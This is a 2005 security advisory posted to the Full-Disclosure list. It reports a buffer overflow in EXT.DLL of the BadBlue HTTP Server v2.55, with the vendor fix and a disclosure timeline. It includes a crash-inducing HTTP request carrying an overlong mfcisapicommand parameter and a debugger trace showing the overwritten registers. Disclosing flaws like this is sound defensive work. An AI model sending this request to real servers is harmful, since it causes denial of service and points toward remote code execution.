SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer overflow
* Release DAte:
February 26, 2005
* Vendor:
Working Resources Inc. http://www.badblue.com
* Versions Affected:
Confirmed under Badblue HTTP Server v2.55
* Severity:
Critical (Remote Code execution)
* Summary:
"BadBlue is not only a server, it's a complete file sharing system that is simply easier and faster to use than anything else. Why? Because BadBlue lets you use a tool you already know well: a web browser."
"In seconds, you can turn your PC into a powerful web server. You can easily share photos, music, videos, and much more. With its simple menu-driven interface and pop-up wizards to guide you through setup, there's no faster way to share files"
* Technical Details:
SIA has discovered a buffer overflow in EXT.DLL, a module that handles badblue http Requests. This buffer overflow triggers when an special crafted HTTP Request is created.
Buffer overflow in EXT.DLL is triggered when a malicious http request that contains a long mfcisapicommand parameter, with more than 250 chars, is submitted. Some registers are overwritten so its possible to execute code or cause a denial of service shutting down the server. The Following request can be used to crash the remote server.
GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx
Windbg trace:
(360.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141 edi=77e2b495
eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
*** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\BadBlue\PE\ext.dll -
ext!GetExtensionVersion+0x13f7:
10042004 8b3e mov edi,[esi] ds:0023:41414141=????????
Succesfully exploitation of this flaw could allow remote code execution with Administrator rigths.
* Solution:
Upgrade to the lastest available version. At this time, vendor provides version v2.6 that is available to download at http://www.badblue.com/bb98.exe
* Credits:
Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability
* Disclosure Timeline:
December 2004 - Discovered
December 20, 2004 - Initial Vendor Notification
December 21, 2004 - Initial Vender Response
January 3, 2005 - Vendor Patch released (v2.60)
February 26, 2005 - Public Disclosure
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
